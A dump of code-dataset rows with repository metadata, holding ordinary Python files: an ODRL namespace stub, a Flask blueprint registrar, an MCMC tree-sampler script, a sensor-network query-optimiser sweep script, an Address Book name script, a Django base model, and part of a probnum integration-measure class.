lt: URIRef # Indicating that a given value is less than the right operand of the Constraint.
lteq: URIRef # Indicating that a given value is less than or equal to the right operand of the Constraint.
media: URIRef # Category of a media asset setting a context for exercising the action of the Rule.
meteredTime: URIRef # An accumulated amount of one to many metered time periods which were used for exercising the action of the Rule. Right operand value MUST be an xsd:duration as defined by [[xmlschema11-2]].
neq: URIRef # Indicating that a given value is not equal to the right operand of the Constraint.
payAmount: URIRef # The amount of a financial payment. Right operand value MUST be an xsd:decimal.
percentage: URIRef # A percentage amount of the target Asset relevant for exercising the action of the Rule. Right operand value MUST be an xsd:decimal from 0 to 100.
perm: URIRef # Permissions take preference over prohibitions.
policyUsage: URIRef # Indicates the actual datetime the action of the Rule was exercised.
product: URIRef # Category of product or service setting a context for exercising the action of the Rule.
prohibit: URIRef # Prohibitions take preference over permissions.
purpose: URIRef # A defined purpose for exercising the action of the Rule.
recipient: URIRef # The party receiving the result/outcome of exercising the action of the Rule.
relativePosition: URIRef # A point in space or time defined with coordinates relative to full measures the positioning of the target Asset.
relativeSize: URIRef # Measure(s) of one or two axes for 2D-objects or measure(s) of one to tree axes for 3D-objects - expressed as percentages of full values - of the target Asset.
relativeSpatialPosition: URIRef # The relative spatial positions - expressed as percentages of full values - of four corners of a rectangle on a 2D-canvas or the eight corners of a cuboid in a 3D-space of the target Asset.
relativeTemporalPosition: URIRef # A point in space or time defined with coordinates relative to full measures the positioning of the target Asset.
resolution: URIRef # Resolution of the rendition of the target Asset.
spatial: URIRef # A named and identified geospatial area with defined borders which is used for exercising the action of the Rule. An IRI MUST be used to represent this value.
spatialCoordinates: URIRef # A set of coordinates setting the borders of a geospatial area used for exercising the action of the Rule. The coordinates MUST include longitude and latitude, they MAY include altitude and the geodetic datum.
support: URIRef # The Action is to be supported as part of the policy โ and the policy remains valid.
system: URIRef # An identified computing system used for exercising the action of the Rule.
systemDevice: URIRef # An identified computing system or computing device used for exercising the action of the Rule.
timeInterval: URIRef # A recurring period of time before the next execution of the action of the Rule. Right operand value MUST be an xsd:duration as defined by [[xmlschema11-2]].
unitOfCount: URIRef # The unit of measure used for counting the executions of the action of the Rule.
version: URIRef # The version of the target Asset.
virtualLocation: URIRef # An identified location of the IT communication space which is relevant for exercising the action of the Rule.
# http://www.w3.org/2004/02/skos/core#Collection
# http://www.w3.org/2004/02/skos/core#Concept
Action: URIRef # An operation on an Asset.
Agreement: URIRef # A Policy that grants the assignee a Rule over an Asset from an assigner.
Assertion: URIRef # A Policy that asserts a Rule over an Asset from parties.
Asset: URIRef # A resource or a collection of resources that are the subject of a Rule.
AssetCollection: URIRef # An Asset that is collection of individual resources
AssetScope: URIRef # Scopes for Asset Scope expressions.
ConflictTerm: URIRef # Used to establish strategies to resolve conflicts that arise from the merging of Policies or conflicts between Permissions and Prohibitions in the same Policy.
Constraint: URIRef # A boolean expression that refines the semantics of an Action and Party/Asset Collection or declare the conditions applicable to a Rule.
Duty: URIRef # The obligation to perform an Action
LeftOperand: URIRef # Left operand for a constraint expression.
LogicalConstraint: URIRef # A logical expression that refines the semantics of an Action and Party/Asset Collection or declare the conditions applicable to a Rule.
Offer: URIRef # A Policy that proposes a Rule over an Asset from an assigner.
Operator: URIRef # Operator for constraint expression.
Party: URIRef # An entity or a collection of entities that undertake Roles in a Rule.
PartyCollection: URIRef # A Party that is a group of individual entities
PartyScope: URIRef # Scopes for Party Scope expressions.
Permission: URIRef # The ability to perform an Action over an Asset.
Policy: URIRef # A non-empty group of Permissions and/or Prohibitions.
Privacy: URIRef # A Policy that expresses a Rule over an Asset containing personal information.
Prohibition: URIRef # The inability to perform an Action over an Asset.
Request: URIRef # A Policy that proposes a Rule over an Asset from an assignee.
RightOperand: URIRef # Right operand for constraint expression.
Rule: URIRef # An abstract concept that represents the common characteristics of Permissions, Prohibitions, and Duties.
Set: URIRef # A Policy that expresses a Rule over an Asset.
Ticket: URIRef # A Policy that grants the holder a Rule over an Asset from an assigner.
UndefinedTerm: URIRef # Is used to indicate how to support Actions that are not part of any vocabulary or profile in the policy expression system.
acceptTracking: URIRef # To accept that the use of the Asset may be tracked.
adHocShare: URIRef # The act of sharing the asset to parties in close proximity to the owner.
aggregate: URIRef # To use the Asset or parts of it as part of a composite collection.
annotate: URIRef # To add explanatory notations/commentaries to the Asset without modifying the Asset in any other way.
anonymize: URIRef # To anonymize all or parts of the Asset.
append: URIRef # The act of adding to the end of an asset.
appendTo: URIRef # The act of appending data to the Asset without modifying the Asset in any other way.
archive: URIRef # To store the Asset (in a non-transient form).
attachPolicy: URIRef # The act of keeping the policy notice with the asset.
attachSource: URIRef # The act of attaching the source of the asset and its derivatives.
attribute: URIRef # To attribute the use of the Asset.
commercialize: URIRef # The act of using the asset in a business environment.
compensate: URIRef # To compensate by transfer of some amount of value, if defined, for using or selling the Asset.
concurrentUse: URIRef # To create multiple copies of the Asset that are being concurrently used.
copy: URIRef # The act of making an exact reproduction of the asset.
core: URIRef # Identifier for the ODRL Core Profile
delete: URIRef # To permanently remove all copies of the Asset after it has been used.
derive: URIRef # To create a new derivative Asset from this Asset and to edit or modify the derivative.
digitize: URIRef # To produce a digital copy of (or otherwise digitize) the Asset from its analogue form.
display: URIRef # To create a static and transient rendition of an Asset.
distribute: URIRef # To supply the Asset to third-parties.
ensureExclusivity: URIRef # To ensure that the Rule on the Asset is exclusive.
execute: URIRef # To run the computer program Asset.
export: URIRef # The act of transforming the asset into a new form.
extract: URIRef # To extract parts of the Asset and to use it as a new Asset.
extractChar: URIRef # The act of extracting (replicating) unchanged characters from the asset.
extractPage: URIRef # The act of extracting (replicating) unchanged pages from the asset.
extractWord: URIRef # The act of extracting (replicating) unchanged words from the asset.
give: URIRef # To transfer the ownership of the Asset to a third party without compensation and while deleting the original asset.
grantUse: URIRef # To grant the use of the Asset to third parties.
include: URIRef # To include other related assets in the Asset.
index: URIRef # To record the Asset in an index.
inform: URIRef # To inform that an action has been performed on or in relation to the Asset.
install: URIRef # To load the computer program Asset onto a storage device which allows operating or running the Asset.
lease: URIRef # The act of making available the asset to a third-party for a fixed period of time with exchange of value.
lend: URIRef # The act of making available the asset to a third-party for a fixed period of time without exchange of value.
license: URIRef # The act of granting the right to use the asset to a third-party.
modify: URIRef # To change existing content of the Asset. A new asset is not created by this action.
move: URIRef # To move the Asset from one digital location to another including deleting the original copy.
nextPolicy: URIRef # To grant the specified Policy to a third party for their use of the Asset.
obtainConsent: URIRef # To obtain verifiable consent to perform the requested action in relation to the Asset.
pay: URIRef # The act of paying a financial amount to a party for use of the asset.
play: URIRef # To create a sequential and transient rendition of an Asset.
present: URIRef # To publicly perform the Asset.
preview: URIRef # The act of providing a short preview of the asset.
print: URIRef # To create a tangible and permanent rendition of an Asset.
read: URIRef # To obtain data from the Asset.
reproduce: URIRef # To make duplicate copies the Asset in any material form.
reviewPolicy: URIRef # To review the Policy applicable to the Asset.
secondaryUse: URIRef # The act of using the asset for a purpose other than the purpose it was intended for.
sell: URIRef # To transfer the ownership of the Asset to a third party with compensation and while deleting the original asset.
share: URIRef # The act of the non-commercial reproduction and distribution of the asset to third-parties.
shareAlike: URIRef # The act of distributing any derivative asset under the same terms as the original asset.
stream: URIRef # To deliver the Asset in real-time.
synchronize: URIRef # To use the Asset in timed relations with media (audio/visual) elements of another Asset.
textToSpeech: URIRef # To have a text Asset read out loud.
transfer: URIRef # To transfer the ownership of the Asset in perpetuity.
transform: URIRef # To convert the Asset into a different format.
translate: URIRef # To translate the original natural language of an Asset into another natural language.
uninstall: URIRef # To unload and delete the computer program Asset from a storage device and disable its readiness for operation.
use: URIRef # To use the Asset
watermark: URIRef # To apply a watermark to the Asset.
write: URIRef # The act of writing to the Asset.
writeTo: URIRef # The act of adding data to the Asset.
# Valid non-python identifiers
_extras = [
"and",
"or",
"#actionConcepts",
"#actions",
"#actionsCommon",
"#assetConcepts",
"#assetParty",
"#assetRelations",
"#assetRelationsCommon",
"#conflictConcepts",
"#constraintLeftOperandCommon",
"#constraintLogicalOperands",
"#constraintRelationalOperators",
"#constraintRightOpCommon",
"#constraints",
"#deprecatedTerms",
"#duties",
"#logicalConstraints",
"#partyConcepts",
"#partyRoles",
"#partyRolesCommon",
"#permissions",
"#policyConcepts",
"#policySubClasses",
"#policySubClassesCommon",
"#prohibitions",
"#ruleConcepts",
]
_NS = Namespace("http://www.w3.org/ns/odrl/2/")
| 0 | 0 | 0 |
846536ef805d07aa120fe6037fec9a5a37e67b93 | 493 | py | Python | app/blueprints.py | excalibur1987/team-management | ed6dfaf83280dad947edb31b404680d6083d7e62 | [
"MIT"
] | 1 | 2021-06-05T16:18:10.000Z | 2021-06-05T16:18:10.000Z | app/blueprints.py | excalibur1987/flask-api-backend-boilerplate | 3f0933599f12b9632a3fc697eb3dde534ec93ce1 | [
"MIT"
] | null | null | null | app/blueprints.py | excalibur1987/flask-api-backend-boilerplate | 3f0933599f12b9632a3fc697eb3dde534ec93ce1 | [
"MIT"
] | null | null | null | from flask import Flask
from app.apis.v1 import api_v1_bp
def register_blueprints(app: "Flask") -> "Flask":
"""A function to register flask blueprint.
To register blueprints add them like the example
Example usage:
from app.blueprints import blueprint
app.register_blueprint(blueprint)
Args:
app (Flask): Flask Application instance
Returns:
Flask: Flask Application instance
"""
app.register_blueprint(api_v1_bp)
return app
| 23.47619 | 52 | 0.693712 | from flask import Flask
from app.apis.v1 import api_v1_bp
def register_blueprints(app: "Flask") -> "Flask":
"""A function to register flask blueprint.
To register blueprints add them like the example
Example usage:
from app.blueprints import blueprint
app.register_blueprint(blueprint)
Args:
app (Flask): Flask Application instance
Returns:
Flask: Flask Application instance
"""
app.register_blueprint(api_v1_bp)
return app
| 0 | 0 | 0 |
09cc33ccba4b0ca212dc86714544f05c4ce8cead | 2,007 | py | Python | experiments/benchmark/run_sampler.py | islamazhar/trees | 502565c5bf02503c7bece09cddd93f9368da02c3 | [
"MIT"
] | 3 | 2017-01-18T21:20:26.000Z | 2019-01-22T19:11:58.000Z | experiments/benchmark/run_sampler.py | islamazhar/trees | 502565c5bf02503c7bece09cddd93f9368da02c3 | [
"MIT"
] | null | null | null | experiments/benchmark/run_sampler.py | islamazhar/trees | 502565c5bf02503c7bece09cddd93f9368da02c3 | [
"MIT"
] | 3 | 2016-10-13T06:31:25.000Z | 2021-11-08T19:09:03.000Z | import networkx as nx
from cStringIO import StringIO
from Bio import Phylo
import matplotlib.pyplot as plt
import random
import logging
from tqdm import tqdm
logger = logging.getLogger()
logger.setLevel(logging.INFO)
import numpy as np
import trees
from trees.ddt import DirichletDiffusionTree, Inverse, GaussianLikelihoodModel
from trees.mcmc import MetropolisHastingsSampler
from trees.util import plot_tree_2d
from sklearn.decomposition import PCA
import seaborn as sns
sns.set_style('white')
import cPickle as pickle
dataset = trees.data.load('zoo')
X, y = dataset.X, dataset.y
X += np.random.normal(scale=0.01, size=X.shape)
pca = PCA(2)
pca.fit(X)
# X = pca.transform(X)
N, D = X.shape
df = Inverse(c=0.9)
lm = GaussianLikelihoodModel(sigma=np.eye(D) / 4.0, sigma0=np.eye(D) / 2.0, mu0=X.mean(axis=0)).compile()
model = DirichletDiffusionTree(df=df, likelihood_model=lm, constraints=[])
sampler = MetropolisHastingsSampler(model, X)
sampler.initialize_assignments()
likelihoods = []
fontsize = 18
| 26.064935 | 105 | 0.715994 | import networkx as nx
from cStringIO import StringIO
from Bio import Phylo
import matplotlib.pyplot as plt
import random
import logging
from tqdm import tqdm
logger = logging.getLogger()
logger.setLevel(logging.INFO)
import numpy as np
import trees
from trees.ddt import DirichletDiffusionTree, Inverse, GaussianLikelihoodModel
from trees.mcmc import MetropolisHastingsSampler
from trees.util import plot_tree_2d
from sklearn.decomposition import PCA
import seaborn as sns
sns.set_style('white')
import cPickle as pickle
dataset = trees.data.load('zoo')
X, y = dataset.X, dataset.y
X += np.random.normal(scale=0.01, size=X.shape)
pca = PCA(2)
pca.fit(X)
# X = pca.transform(X)
N, D = X.shape
df = Inverse(c=0.9)
lm = GaussianLikelihoodModel(sigma=np.eye(D) / 4.0, sigma0=np.eye(D) / 2.0, mu0=X.mean(axis=0)).compile()
model = DirichletDiffusionTree(df=df, likelihood_model=lm, constraints=[])
sampler = MetropolisHastingsSampler(model, X)
sampler.initialize_assignments()
likelihoods = []
fontsize = 18
def iterate(n_iters):
for i in tqdm(xrange(n_iters)):
sampler.sample()
likelihoods.append(sampler.tree.marg_log_likelihood())
plt.figure()
plt.xlabel("Iterations", fontsize=fontsize)
plt.ylabel("Data Log Likelihood", fontsize=fontsize)
plt.plot(likelihoods)
plt.legend(loc='best', fontsize=12)
plt.savefig('unconstrained-likelihoods.png', bbox_inches='tight')
final_tree = sampler.tree.copy()
plt.figure()
plot_tree_2d(final_tree, X, pca)
for node in final_tree.dfs():
if node.is_leaf():
node.point = y[node.point]
plt.figure()
newick = final_tree.to_newick()
tree = Phylo.read(StringIO(newick), 'newick')
Phylo.draw_graphviz(tree, prog='neato')
plt.savefig('unconstrained-tree.png', bbox_inches='tight')
graph = Phylo.to_networkx(tree)
with open('unconstrained-tree.nwk', 'w') as fp:
print >>fp, newick,
nx.write_dot(graph, 'unconstrained-tree.dot')
plt.show()
| 972 | 0 | 23 |
37dd96679211af25ef8e409406d45a4f07bce62d | 8,666 | py | Python | scripts/qos-exp/nn2-sweep.py | ixent/qosa-snee | cc103a2f50262cad1927976a0b7f99554362581d | [
"BSD-3-Clause"
] | 1 | 2019-01-19T06:45:42.000Z | 2019-01-19T06:45:42.000Z | scripts/qos-exp/nn2-sweep.py | ixent/qosa-snee | cc103a2f50262cad1927976a0b7f99554362581d | [
"BSD-3-Clause"
] | null | null | null | scripts/qos-exp/nn2-sweep.py | ixent/qosa-snee | cc103a2f50262cad1927976a0b7f99554362581d | [
"BSD-3-Clause"
] | 3 | 2017-03-08T17:42:16.000Z | 2021-05-28T16:01:30.000Z | #!/usr/bin/python
import getopt, logging, sys, SneeqlLib, UtilLib, AvroraLib, os, checkTupleCount
queryMap = {'Q2' : 'input/pipes/Q2.txt', 'Q4' : 'input/pipes/QNest4.txt', 'Q5' : 'input/pipes/QNest5.txt'}
networkMap = {'10' : 'input/networks/10-node-topology.xml', '30' : 'scripts/qos-exp/scenarios/30-dense-net.xml', '100' : 'scripts/qos-exp/scenarios/ix-100-dense-net.xml'}
numSourcesMap = {'10_3' : 'input/pipes/10Sites-3Sources-schemas.xml', '10_10' : 'input/pipes/10Sites-10Sources-schemas.xml', '30_min' : 'scripts/qos-exp/scenarios/30-node-min-schema.xml', '30_maj' : 'scripts/qos-exp/scenarios/30-node-maj-schema.xml', '100_min' : 'scripts/qos-exp/scenarios/100-node-min-schema.xml', '100_maj' : 'scripts/qos-exp/scenarios/100-node-maj-schema.xml'}
optGoalMap = {'min_delivery' : 'input/QoS/qos-spec-min-delivery.xml', 'min_energy' : 'input/QoS/qos-spec-min-energy.xml', 'max_lifetime' : 'input/QoS/qos-spec-max-lifetime.xml'}
optMinNN = 0
optMaxNN = 30
optSolverOutput = None
#Ouput info message to screen and logger if applicable
#Ouput warning message to screen and logger if applicable
#Ouput error message to screen and logger if applicable
if __name__ == "__main__":
main()
| 35.371429 | 381 | 0.681168 | #!/usr/bin/python
import getopt, logging, sys, SneeqlLib, UtilLib, AvroraLib, os, checkTupleCount
def usage():
print '''Usage: nn-sweep.py <parameters>
--query=[Q2|Q4|Q5]
--network_size=[n]
--network_type=[A|B]
--num_sources=[3|10|min|maj]
--optimization-goal=[min_delivery,min_energy,max_lifetime]
--max-nn=<num_neighbours>
--output-root=<path>
'''
queryMap = {'Q2' : 'input/pipes/Q2.txt', 'Q4' : 'input/pipes/QNest4.txt', 'Q5' : 'input/pipes/QNest5.txt'}
networkMap = {'10' : 'input/networks/10-node-topology.xml', '30' : 'scripts/qos-exp/scenarios/30-dense-net.xml', '100' : 'scripts/qos-exp/scenarios/ix-100-dense-net.xml'}
numSourcesMap = {'10_3' : 'input/pipes/10Sites-3Sources-schemas.xml', '10_10' : 'input/pipes/10Sites-10Sources-schemas.xml', '30_min' : 'scripts/qos-exp/scenarios/30-node-min-schema.xml', '30_maj' : 'scripts/qos-exp/scenarios/30-node-maj-schema.xml', '100_min' : 'scripts/qos-exp/scenarios/100-node-min-schema.xml', '100_maj' : 'scripts/qos-exp/scenarios/100-node-maj-schema.xml'}
optGoalMap = {'min_delivery' : 'input/QoS/qos-spec-min-delivery.xml', 'min_energy' : 'input/QoS/qos-spec-min-energy.xml', 'max_lifetime' : 'input/QoS/qos-spec-max-lifetime.xml'}
optMinNN = 0
optMaxNN = 30
optSolverOutput = None
def parseArgs(args):
global optQuery, optNetworkSize, optNetworkType, optNumSources, optOptGoal, optMinNN, optMaxNN, optOutputRoot, optSolverOutput
try:
optNames = ["help", "query=", "net-size=", "net-type=", "num-sources=", "opt-goal=", "min-nn=", "max-nn=", "output-root=", "solver-output="]
optNames += SneeqlLib.getOptNames();
opts, args = getopt.getopt(args, "h",optNames)
except getopt.GetoptError, err:
print str(err)
usage()
sys.exit(2)
for o, a in opts:
if (o == "-h" or o== "--help"):
usage()
sys.exit()
if (o == '--query'):
if queryMap.has_key(a):
optQuery = a;
else:
print 'invalid query'
sys.exit(2)
if (o == '--net-size'):
if networkMap.has_key(a):
optNetworkSize = a;
else:
print 'invalid network'
sys.exit(2)
if (o == '--net-type'):
if (a=='A' or a == 'B'):
optNetworkType = a;
else:
print 'invalid network type'
sys.exit(2)
if (o == '--num-sources'):
if numSourcesMap.has_key(optNetworkSize+'_'+a):
optNumSources = a;
else:
print 'invalid network type'
sys.exit(2)
if (o == '--opt-goal'):
if optGoalMap.has_key(a):
optOptGoal = a;
else:
print 'invalid optimization goal'
sys.exit(2)
if (o == '--min-nn'):
optMinNN = int(a)
if (o == '--max-nn'):
optMaxNN = int(a)
if (o == '--output-root'):
optOutputRoot = a;
if (o == '--solver-output'):
optSolverOutput = a;
SneeqlLib.setOpts(opts)
#Ouput info message to screen and logger if applicable
def report(message):
if (logger != None):
logger.info (message)
print message
#Ouput warning message to screen and logger if applicable
def reportWarning(message):
if (logger != None):
logger.warning(message)
print message
#Ouput error message to screen and logger if applicable
def reportError(message):
if (logger != None):
logger.error(message)
print message
def startLogger(timeStamp):
global logger
logger = logging.getLogger('test')
#create the directory if required
if not os.path.isdir(optOutputRoot):
os.makedirs(optOutputRoot)
hdlr = logging.FileHandler('%s/test%s.log' % (optOutputRoot, timeStamp))
formatter = logging.Formatter('%(asctime)s %(levelname)s %(message)s')
hdlr.setFormatter(formatter)
logger.addHandler(hdlr)
logger.setLevel(logging.INFO)
logger.info('nn2 sweep')
#Register the logger with the libraries this module uses
SneeqlLib.registerLogger(logger)
#TossimLib.registerLogger(logger)
AvroraLib.registerLogger(logger)
checkTupleCount.registerLogger(logger)
#RandomSeeder.registerLogger(logger)
def invokeQueryOptimizer(outputDir, queryFile, networkFile, heteroNet, schemaFile, qosFile, nn):
fixedParams = ['-qos-acquisition-interval=10000', '-qos-buffering-factor=1', '-targets=avrora1,tossim1', '-qos-aware-where-scheduling=true', '-haskell-use=true', "-nesc-control-radio-off=true", "-nesc-adjust-radio-power=true", "-nesc-power-management=true", "-delete-old-files=true"]
varParams = ['-query='+queryFile, '-network-topology-file='+networkFile, '-where-scheduling-hetero-net='+str(heteroNet), '-schema-file='+schemaFile, '-qos-file='+qosFile, '-output-root-dir='+outputDir]
varParams += ['-where-scheduling-min-nn='+str(nn), '-where-scheduling-max-nn='+str(nn), '-where-scheduling-heuristic-init-point=false', '-nesc-led-debug=false']
if (optSolverOutput!=None):
varParams += ['-where-scheduling-solver-output='+optSolverOutput]
queryCompilerParams = fixedParams + varParams
exitVal = SneeqlLib.compileQueryParamStr(queryCompilerParams, optQuery)
if (exitVal != 0):
return;
def logToDataFile(overallOutputDir, nn, objFnVal, measuredVal, numDAFs):
scriptFile = overallOutputDir+'/data.txt'
if not os.path.exists(scriptFile):
f = open(scriptFile,'w')
f.write('"NN"\t"fn_val"\t"measured"\t"num DAFs"\n')
f.close()
f = open(scriptFile,'a')
f.write('%d\t%s\t%g\t%s\n' % (nn, objFnVal, measuredVal, numDAFs))
f.close()
def parseOutFile(outFilePath):
ofile = open(outFilePath, 'r')
summary = {}
summaryFlag = False
for line in ofile:
if line.startswith('*** Summary ***'):
summaryFlag = True
continue
if line.startswith('*** Assignment ***'):
break
if line.strip()=='':
continue
if summaryFlag:
(key, val) = line.split('=')
summary[key] = val.strip();
ofile.close()
return summary
def mainLoop():
queryFile = queryMap[optQuery]
networkFile = networkMap[optNetworkSize]
heteroNet = (optNetworkType == 'B')
schemaFile = numSourcesMap[optNetworkSize+'_'+optNumSources]
qosFile = optGoalMap[optOptGoal]
overallOutputDir = optOutputRoot + '/' + optQuery + '-' + optNetworkSize + 'n-type' + optNetworkType + '-' + optNumSources + 's-' + optOptGoal
duration = 100;
# for nn in range(optMinNN,optMaxNN+1):
for nn in [0,1,3,5,10,15,20]:
runOutputDir = overallOutputDir + '/nn' + str(nn)
invokeQueryOptimizer(runOutputDir, queryFile, networkFile, heteroNet, schemaFile, qosFile, nn)
summary = parseOutFile(runOutputDir+'/'+optQuery+'/query-plan/matlab/wheresched/out'+str(nn)+'.txt')
if optOptGoal=='min_delivery':
#check all tuples present
queryPlanSummaryFile = "%s/%s/query-plan/query-plan-summary.txt" % (runOutputDir, optQuery)
deliveryTime = SneeqlLib.getDeliveryTime(queryPlanSummaryFile)
logToDataFile(overallOutputDir, nn, summary['min_f'], float(deliveryTime), summary['num DAFs considered'])
else:
#Compile the nesC
nescDir = runOutputDir + '/'+optQuery + '/avrora1'
exitVal = AvroraLib.compileNesCCode(nescDir)
if (exitVal != 0):
reportError("Error compiling avrora nesC code")
return;
AvroraLib.generateODs(nescDir)
#Invoke Avrora simulation
avroraNetFile = UtilLib.winpath(os.getenv('SNEEQLROOT'))+'\\\\'+networkFile.replace('.xml', '.top')
(avroraOutputFile, traceFilePath) = AvroraLib.runSimulation(nescDir, runOutputDir, optQuery, int(optNetworkSize), simulationDuration = duration, networkFilePath = avroraNetFile)
#Check query results
schemaPath = os.getenv('SNEEQLROOT')+'/'+schemaFile
checkTupleCount.checkResults(optQuery, traceFilePath, schemaPath, 10000, 1, duration)
#Report total energy consumption
siteLifetimeRankFile = "%s/site-lifetime-rank.csv" % nescDir
(sumEnergy, maxEnergy, averageEnergy, radioEnergy, cpu_cycleEnergy, sensorEnergy, otherEnergy, networkLifetime) = AvroraLib.computeEnergyValues(runOutputDir, duration, inputFile = "avrora-out.txt", ignoreLedEnergy = True, siteLifetimeRankFile = siteLifetimeRankFile)
report("The total energy consumption is %f" % (sumEnergy))
report("The lifetime for this network is %f" % (networkLifetime)) #seems to be in seconds
if optOptGoal=='min_energy':
logToDataFile(overallOutputDir, nn, summary['min_f'], float(sumEnergy), summary['num DAFs considered'])
else:
logToDataFile(overallOutputDir, nn, summary['min_f'], float(networkLifetime), summary['num DAFs considered'])
def main():
#parse the command-line arguments
parseArgs(sys.argv[1:])
timeStamp = UtilLib.getTimeStamp()
startLogger(timeStamp)
SneeqlLib.compileQueryOptimizer()
mainLoop()
if __name__ == "__main__":
main()
| 7,161 | 0 | 269 |
54fa8cb4636d823aa634912d24017e8db3798df3 | 704 | py | Python | UsePhoneticName.py | fishy/scripts | 91abd0451cae916d885f4ff0fd2f69d335d37cf3 | [
"BSD-3-Clause"
] | 4 | 2016-05-09T13:42:23.000Z | 2021-11-29T15:16:11.000Z | UsePhoneticName.py | fishy/scripts | 91abd0451cae916d885f4ff0fd2f69d335d37cf3 | [
"BSD-3-Clause"
] | null | null | null | UsePhoneticName.py | fishy/scripts | 91abd0451cae916d885f4ff0fd2f69d335d37cf3 | [
"BSD-3-Clause"
] | null | null | null | #!/usr/bin/python
import sys
from Foundation import *
from ScriptingBridge import *
ab = SBApplication.applicationWithBundleIdentifier_("com.apple.AddressBook")
for person in ab.people():
fname = person.firstName()
pfname = person.phoneticFirstName()
lname = person.lastName()
plname = person.phoneticLastName()
note = person.note()
print "%s %s %s %s %s" % (fname, pfname, lname, plname, note)
if pfname and plname:
cname = lname + fname
if note:
note = cname + "\n" + note
else:
note = cname
person.setPhoneticLastName_("")
person.setPhoneticFirstName_("")
person.setFirstName_(pfname)
person.setLastName_(plname)
person.setNote_(note)
print "Done."
| 22.709677 | 76 | 0.697443 | #!/usr/bin/python
import sys
from Foundation import *
from ScriptingBridge import *
ab = SBApplication.applicationWithBundleIdentifier_("com.apple.AddressBook")
for person in ab.people():
fname = person.firstName()
pfname = person.phoneticFirstName()
lname = person.lastName()
plname = person.phoneticLastName()
note = person.note()
print "%s %s %s %s %s" % (fname, pfname, lname, plname, note)
if pfname and plname:
cname = lname + fname
if note:
note = cname + "\n" + note
else:
note = cname
person.setPhoneticLastName_("")
person.setPhoneticFirstName_("")
person.setFirstName_(pfname)
person.setLastName_(plname)
person.setNote_(note)
print "Done."
| 0 | 0 | 0 |
aef7622db3edeec58c535a35d0af6b1e392615d4 | 450 | py | Python | pyconca2017/utils/models.py | merwok-forks/pyconca-2017-web | 4c1fca758e54f7799e7f557236a5b7c3db8dcb2b | [
"MIT"
] | null | null | null | pyconca2017/utils/models.py | merwok-forks/pyconca-2017-web | 4c1fca758e54f7799e7f557236a5b7c3db8dcb2b | [
"MIT"
] | null | null | null | pyconca2017/utils/models.py | merwok-forks/pyconca-2017-web | 4c1fca758e54f7799e7f557236a5b7c3db8dcb2b | [
"MIT"
] | null | null | null | from django.db import models
from django.utils.text import ugettext_lazy as _
from model_utils.fields import AutoCreatedField, AutoLastModifiedField
class BaseModel(models.Model):
"""
An abstract base class model that providers self-updating `created` and
`modified` fields.
"""
date_added = AutoCreatedField(_('date added'))
date_updated = AutoLastModifiedField(_('date updated'))
| 26.470588 | 75 | 0.731111 | from django.db import models
from django.utils.text import ugettext_lazy as _
from model_utils.fields import AutoCreatedField, AutoLastModifiedField
class BaseModel(models.Model):
"""
An abstract base class model that providers self-updating `created` and
`modified` fields.
"""
date_added = AutoCreatedField(_('date added'))
date_updated = AutoLastModifiedField(_('date updated'))
class Meta:
abstract = True
| 0 | 14 | 27 |
3d49ec04019e9889366c1843e35834272201e46f | 9,163 | py | Python | src/probnum/quad/_integration_measures.py | christopheroates/probnum | 4ae63da307bd7279c3ce477ef68cbd0b8e30c73a | [
"MIT"
] | 226 | 2019-11-01T09:44:09.000Z | 2022-03-30T23:17:17.000Z | src/probnum/quad/_integration_measures.py | christopheroates/probnum | 4ae63da307bd7279c3ce477ef68cbd0b8e30c73a | [
"MIT"
] | 590 | 2019-11-21T08:32:30.000Z | 2022-03-31T12:37:37.000Z | src/probnum/quad/_integration_measures.py | christopheroates/probnum | 4ae63da307bd7279c3ce477ef68cbd0b8e30c73a | [
"MIT"
] | 39 | 2020-01-13T16:29:45.000Z | 2022-03-28T16:16:54.000Z | """Contains integration measures."""
import abc
from typing import Optional, Tuple, Union
import numpy as np
import scipy.stats
from probnum.randvars import Normal
from probnum.typing import FloatArgType, IntArgType
class IntegrationMeasure(abc.ABC):
"""An abstract class for a measure against which a target function is integrated.
Child classes implement specific integration measures and, if available, make use
of random variables for sampling and evaluation of the density function.
Parameters
----------
dim :
Dimension of the integration domain.
domain :
Tuple which contains two arrays which define the start and end points,
respectively, of the rectangular integration domain.
"""
def __call__(self, points: Union[float, np.floating, np.ndarray]) -> np.ndarray:
"""Evaluate the density function of the integration measure.
Parameters
----------
points :
*shape=(n_points,) or (n_points, dim)* -- Input locations.
Returns
-------
density_evals :
*shape=(n_points,)* -- Density evaluated at given locations.
"""
# pylint: disable=no-member
return self.random_variable.pdf(points).squeeze()
def sample(
self,
rng: np.random.Generator,
n_sample: IntArgType,
) -> np.ndarray:
"""Sample ``n_sample`` points from the integration measure.
Parameters
----------
rng :
Random number generator
n_sample :
Number of points to be sampled
Returns
-------
points :
*shape=(n_sample,) or (n_sample,dim)* -- Sampled points
"""
# pylint: disable=no-member
return np.reshape(
self.random_variable.sample(rng=rng, size=n_sample),
newshape=(n_sample, self.dim),
)
def _set_dimension_domain(
self,
dim: IntArgType,
domain: Tuple[Union[np.ndarray, FloatArgType], Union[np.ndarray, FloatArgType]],
) -> None:
"""Sets the integration domain and dimension.
The following logic is used to set the domain and dimension:
1. If ``dim`` is not given (``dim == None``):
1a. If either ``domain[0]`` or ``domain[1]`` is a scalar, the dimension
is set as the maximum of their lengths and the scalar is expanded to
a constant vector.
1b. Otherwise, if the ``domain[0]`` and ``domain[1]`` are not of equal
length, an error is raised.
2. If ``dim`` is given:
2a. If both ``domain[0]`` and ``domain[1]`` are scalars, they are
expanded to constant vectors of length ``dim``.
2b. If only one of `domain[0]`` and ``domain[1]`` is a scalar and the
length of the other equals ``dim``, the scalar one is expanded to a
constant vector of length ``dim``.
2c. Otherwise, if neither of ``domain[0]`` and ``domain[1]`` is a
scalar, error is raised if either of them has length which does not
equal ``dim``.
"""
domain_a_dim = np.size(domain[0])
domain_b_dim = np.size(domain[1])
# Check that given dimensions match and are positive
dim_mismatch = False
if dim is None:
if domain_a_dim == domain_b_dim:
dim = domain_a_dim
elif domain_a_dim == 1 or domain_b_dim == 1:
dim = np.max([domain_a_dim, domain_b_dim])
else:
dim_mismatch = True
else:
if (domain_a_dim > 1 or domain_b_dim > 1) and dim != np.max(
[domain_a_dim, domain_b_dim]
):
dim_mismatch = True
if dim_mismatch:
raise ValueError(
"Domain limits must have the same length or at least "
"one of them has to be one-dimensional."
)
if dim < 1:
raise ValueError(f"Domain dimension dim = {dim} must be positive.")
# Use same domain limit in all dimensions if only one limit is given
if domain_a_dim == 1:
domain_a = np.full((dim,), domain[0])
else:
domain_a = domain[0]
if domain_b_dim == 1:
domain_b = np.full((dim,), domain[1])
else:
domain_b = domain[1]
